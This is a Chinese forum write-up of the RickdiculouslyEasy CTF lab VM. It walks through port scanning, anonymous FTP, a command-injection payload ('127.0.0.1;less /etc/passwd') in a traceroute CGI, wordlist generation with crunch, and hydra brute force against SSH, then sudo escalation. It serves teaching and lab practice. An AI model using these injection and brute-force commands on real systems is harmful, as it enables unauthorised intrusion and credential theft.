-
-
[原创]RickdiculouslyEasy-CTF挑战
-
发表于: 2021-3-8 21:43
-
RickdiculouslyEasy-CTF挑战
注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。
RickdiculouslyEasy
这个靶机一共有12个flag,一共是130,我们一起来进行这个挑战,看看大家能够拿到多少个flag
信息收集
1 | nmap -A -sV -O -T4 -P- 10.10.10.221 |
我们可以看到ftp版本比较的低
尝试匿名登录ftp
1 2 3 | ftp 10.10.10.221#注意密码为空格get FLAG.txt #使用get命令下载 |
拿到后我们cat查看flag
现在我们拿到了10分
尝试登录ssh
他说SHH关闭???
我们再去看看nmap扫描信息
SHH还标记了问号,他说欢迎访问Ubuntu系统??,因此我们可以判断这个ssh是伪造的,那么我们就绕开它不耽误时间了。
访问80端口
1 | http://10.10.10.221 |
发现了一个大头,好像很聪明的样子,得知这个头像名字叫做morty,应该是个动漫人物,感兴趣的朋友可以去看看,那么进来了,我们可以使用robots.txt协议看一下
经过几番尝试,我发现第二个目录可以访问
这个东西我们一会再仔细给大家讲解,不慌,我们再看看其他的几个端口。
访问9090端口
这个端口开启了web服务,我们访问站点看一看 
我们又获得了一个flag,得到了第二十分。
nmap13337端口扫描发现flag
观察nmap就发现了这个flag,没有想到居然能够那么容易就又拿到10分。
发现伪装的SSH端口
我们发现这个端口是ssh端口,它进行了伪装
使用nc连接后门
在这里我们可以看到,这里有一个后门,那么我们可以使用nc连接一下
1 | nc 10.10.10.221 60000 |
又拿到了一个flag,你欣喜若狂,你以为可以提权直接完事的时候,然而啪啪打脸。
这东西好像除了让你看到flag,其他的什么也干不成!
对站点进行目录扫描
1 | nikto -host http://10.10.10.221 |
添加使用目录
1 | http://10.10.10.221/passwords/ |
这里我们也看到了一个flag
第二个目录说
哇,莫迪真聪明。将密码存储在一个名为password .html的文件中?这次你真的做到了,莫蒂。至少让我把它们藏起来。我会把它们全删了但我知道你会去找你妈妈。这是我最不需要的
我们看一下它的代码
在这里我们好像发现了它的密码
先把它存在我们的密码字典中,留着准备一会看看能不能进行暴力破解
命令注入漏洞
我们再回到http://10.10.10.221/cgi-bin/tracertool.cgi这个目录
可以看到这个小东西,有路由跟踪的功能。
那么我们可以进行拼接来查看系统信息;这是一个命令注入漏洞。
1 | 127.0.0.1;cat /etc/passwd |
cat 命令出来一只猫,还真是,cat不就是猫吗,既然不让我们用,那我们用其他的用户来查看系统用户文件
1 | 127.0.0.1;less /etc/passwd |
1 2 3 | RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bashMorty:x:1001:1001::/home/Morty:/bin/bashSummer:x:1002:1002::/home/Summer:/bin/bash |
在这我们拿到了它的三个用户,我们之前不是在源代码中找到一个密码?那么我们现在可以进行暴力破解了
暴力破解SSH用户
1 | hydra -L user.txt -P passwd.txt 10.10.10.221 -s22222 ssh |
使用SSH连接用户
1 2 | ssh -p22222 Summer@10.10.10.221# -p 指定端口 |
60分了
看另外两个文件,好像不能够查看,我们使用scp命令将它拷贝到kali中来查看
1 2 3 4 | # scp 安全的远程拷贝工具scp /home/Morty/journal.txt.zip root@10.10.10.128:~/work/exam/RickdiculouslyEasyscp /home/Morty/Safe_Password.jpg root@10.10.10.128:~/work/exam/RickdiculouslyEasy |
东西拷贝过来了发现居然还要密码,有些让人无奈
而另一个呢是个图片文件
隐写术
- 取证工具(binwalk)
Binwalk是一款快速,易用,用于分析,逆向工程和提取固件映像的工具
另一个图片文件它说是安全的密码,这就涉及到了密码学隐写术了。
我们拿到了压缩包密码,去看看有什么花样
我们拿到了一个价值20分的flag,他说rike告诉他一个天大的秘密,一个安全的密码 safe
我们进入到rike目录下将文件全部拷贝到当前用户
1 2 | cp RICKS_SAFE/safe /home/Summer/cp ThisDoesntContainAnyFlags/NotAFlag.txt /home/Summer/ |
这个文件拷贝到远程没有用,ls -l看到safe是个可执行文件,./执行没有作用 他说该死的命令行,后面的那个单词好像是参数,
把之前的数字参数和现在的safe文件连接起来在本地执行,就获得了到了这个flag和提示!
这里面有一些提示我们来看看
1 uppercase character
1 digit
One of the words in my old bands name.� @
社工找到rike以前乐队的名字
The Flesh Curtains
使用给定字符集制作口令字典的工具
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | 语法:crunch <min-len> <max-len> [<charset string>] [options]crunch 最小长度 最大长度 字符(集) 选项常用选项:-t #定义输出格式@代表小写字母,代表大写字母%代表数字^代表符号**The Flesh Curtains rike以前的乐队**口令:大写字母(26英文字母)数字乐队当中的一个单词crunch 5 5 -t ,%The > rike-pass.txtcrunch 7 7 -t ,%Flesh >> rike-pass.txtcrunch 10 10 -t ,%Curtains >>rike-pass.txt |
将字典做好后便可进行暴力破解
使用hydir进行暴力破解
1 | hydra -l RickSanchez -P rike-pass.txt ssh://10.10.10.221:22222 |
使用SSH登录用户
1 2 3 | ssh -p 22222 RickSanchez@10.10.10.221sudo su #使用sudo提权 |
然后我们就拿到了130分,这章靶机完结不知道大家没有什么收获哈哈哈
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
